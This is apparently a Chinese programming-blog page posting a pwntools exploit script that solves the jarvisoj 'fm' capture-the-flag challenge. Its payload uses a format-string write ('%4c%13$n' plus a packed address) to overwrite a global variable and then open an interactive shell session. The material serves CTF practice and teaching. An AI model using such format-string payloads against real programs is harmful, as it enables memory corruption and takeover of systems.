jarvisoj_fm[FmtStr]
程序员文章站
2022-05-16 23:29:52
...
exp
from pwn import *
context.log_level = 'debug'
def debug_pause():
log.info(proc.pidof(p))
pause()
proc_name = './fm'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 26659)
x_addr = 0x804a02c
payload = flat(['%4c%13$n', p32(x_addr)])
# payload = b'a' * 4 + b'-%x' * 20
p.send(payload)
p.interactive()
下一篇: PHP内核研究:HASH表和变量
推荐阅读